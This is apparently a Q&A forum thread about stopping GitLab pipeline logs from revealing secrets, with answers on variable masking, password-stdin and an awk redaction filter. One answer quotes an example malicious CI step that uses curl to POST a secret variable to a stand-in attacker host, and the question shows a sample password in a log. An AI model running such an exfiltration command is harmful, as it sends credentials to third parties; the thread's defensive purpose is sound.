Reputation: 741
When I run a bash file in a stage (GitLab pipeline), it displays the GitLab secret values in the logs, which ideally should not be visible. How can I avoid this?
GitLab pipeline stage:

```yaml
stage: docker_push
script:
  - /home/directory/dockerPush.sh
tags:
  - docker
```

bash file (dockerPush.sh) content:

```bash
docker login --username foo --password ${DOCKER_LOGIN_PASSWORD}
docker push ${IMAGE_NAME}
```

Pipeline logs:

```
+ docker login --username foo --password Doc49byfe
```
Upvotes: 2
Views: 6002
Reputation: 22353
There are Group-Level Environmental Variables available in GitLab:
You can define per-project or per-group variables that are set in the pipeline environment. Group-level variables are stored out of the repository (not in .gitlab-ci.yml). They are securely passed to GitLab Runner, which makes them available during a pipeline run.

We recommend using group environment variables to store secrets (like passwords, SSH keys, and credentials) for Premium users who:
- Do not use an external key store.
- Use GitLab’s integration with HashiCorp Vault.
Further:
Security
Malicious code pushed to your .gitlab-ci.yml file could compromise your variables and send them to a third party server regardless of the masked setting. If the pipeline runs on a protected branch or protected tag, it could also compromise protected variables.

All merge requests that introduce changes to .gitlab-ci.yml should be reviewed carefully before:
- Running a pipeline in the parent project for a merge request submitted from a forked project.
- Merging the changes.

Here is a simplified example of a malicious .gitlab-ci.yml:

```yaml
build:
  script:
    - curl --request POST --data "secret_variable=$SECRET_VARIABLE" https://maliciouswebsite.abcd/
```
About Masking
Mask variable (Optional): If selected, the variable’s Value is not shown in job logs. The variable is not saved if the value does not meet the masking requirements.
Enabling debug tracing can have severe security implications. The output will contain the content of all your variables and any other secrets! The output will be uploaded to the GitLab server and made visible in job logs!
Conclusion:
Upvotes: 1
Reputation: 1435
You need to use the mask feature, as in Glen's answer.
But the mask feature has some limitations related to the format of your variable; see this documentation: https://docs.gitlab.com/ee/ci/variables/#masked-variable-requirements
If GitLab refuses to mask your variable, you need to do it in your shell script.
A simple way is to send the output to a file (if you really need the log); the other option is to send the output to /dev/null.
Upvotes: 1
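As an added example (not the asker's dockerPush.sh or anything from GitLab's docs), here is a version of the script that keeps the password out of the job log even when the shell is tracing commands with `-x`, plus a filter for the "mask it yourself" case in the answer above. It assumes GitLab exports DOCKER_LOGIN_PASSWORD and IMAGE_NAME into the job environment, as in the question, and that `docker` is the real CLI.

```shell
#!/bin/sh
# Added example, not the asker's script. Secrets are referenced by variable
# NAME, so a traced call line such as "+ docker_login_quiet foo DOCKER_LOGIN_PASSWORD"
# never contains the value. Assumes GitLab has exported the CI variables.

# docker_login_quiet USER VARNAME: log in using the secret stored in $VARNAME.
docker_login_quiet() {
    user="$1"; varname="$2"; restore_x=""
    case "$-" in *x*) restore_x=1; set +x ;; esac   # suspend "+ ..." echo lines
    eval "secret=\$$varname"                         # read the value only once tracing is off
    # --password-stdin keeps the value out of argv, so neither the log nor `ps` sees it
    printf '%s' "$secret" | docker login --username "$user" --password-stdin >/dev/null
    rc=$?
    unset secret
    [ -n "$restore_x" ] && set -x                    # restore tracing only if it was on
    return "$rc"
}

# redact VARNAME: stdin-to-stdout filter that replaces every literal occurrence of
# $VARNAME's value with [MASKED]. Use it when GitLab refuses to mask the variable.
# awk's index() does plain-string matching, so the value needs no regex escaping,
# and the replacement is built into a separate buffer so "[MASKED]" itself is never
# rescanned (a secret such as "MASK" cannot loop forever).
redact() {
    awk -v name="$1" '
        BEGIN   { s = ENVIRON[name] }
        s == "" { print; next }                      # unset/empty: pass through
        {
            out = ""; rest = $0
            while ((i = index(rest, s)) > 0) {
                out = out substr(rest, 1, i - 1) "[MASKED]"
                rest = substr(rest, i + length(s))
            }
            print out rest
        }'
}

# Pipeline usage (the secret is named, never expanded, on these lines):
#   docker_login_quiet foo DOCKER_LOGIN_PASSWORD
#   docker push "$IMAGE_NAME" 2>&1 | redact DOCKER_LOGIN_PASSWORD
```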
Reputation: 2210
Did you try to add your env variable from the GitLab admin panel, and set your variable to protected? Here is an example: https://secrethub.io/docs/guides/gitlabci/#provide-credential best,
Upvotes: -1